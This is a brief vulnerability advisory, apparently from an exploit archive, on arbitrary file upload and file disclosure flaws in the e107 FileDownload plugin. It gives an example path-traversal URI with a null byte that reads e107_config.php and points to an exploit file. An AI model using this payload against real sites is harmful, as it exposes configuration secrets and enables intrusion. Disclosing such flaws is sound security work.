e107 FileDownload Plugin Arbitrary File Upload and Remote File Disclosure Vulnerabilities

e107 FileDownload Plugin Arbitrary File Upload and Remote File Disclosure Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URI and exploit are available:

http://www.example.com/e107/e107_plugins/filedownload/filedownload/file_info/admin/edit.php?file=../../../../../e107_config.php%00

/data/vulnerabilities/exploits/54098.php.txt